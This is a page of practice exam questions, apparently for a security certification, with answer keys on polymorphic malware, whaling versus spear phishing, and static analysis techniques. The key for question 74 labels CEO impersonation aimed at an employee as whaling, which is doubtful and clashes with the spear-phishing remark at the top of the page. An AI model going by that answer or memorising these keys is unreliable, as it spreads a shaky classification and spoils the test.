Spear phishing targets specific individuals or organizations with personalized content. The misspelled domain and urgency are classic spear phishing indicators.

73
MCQmedium

Which type of malware is characterized by modifying its own code to evade signature-based detection, often changing its appearance each time it replicates?

A.Polymorphic virus
B.Trojan horse
C.Macro virus
D.Boot sector virus
AnswerA

Polymorphic viruses change their code on each infection.

Why this answer

Polymorphic malware changes its code (but retains functionality) to avoid detection by signature-based antivirus.

74
MCQmedium

An organization receives an email that appears to be from the CEO, urgently requesting that the recipient wire funds to a new vendor. The email contains the CEO's name and title but the sender address is slightly misspelled. Which type of social engineering attack is this?

A.Pretexting
B.Whaling
C.Vishing
D.Spear phishing
AnswerB

Whaling targets senior executives with personalized scams.

Why this answer

Whaling targets senior executives (like the CEO) with personalized phishing emails, often involving financial fraud.

75
Multi-Selectmedium

Which TWO of the following are examples of static malware analysis techniques? (Select two.)

Select 2 answers
A.Running the malware in a sandbox
B.Capturing network traffic during execution
C.Monitoring process behavior with Process Monitor
D.Checking file hash on VirusTotal
E.Examining strings in the binary
AnswersD, E

VirusTotal uses static signatures.

Why this answer

Static analysis examines the malware without executing it. String analysis looks for embedded strings, and VirusTotal checks hashes against known signatures. Sandboxing and process monitoring are dynamic analysis.

Page 1 of 3 · 216 questions totalNext →

Ready to test yourself?

Try a timed practice session using only Malware, Social Engineering and Network Attacks questions.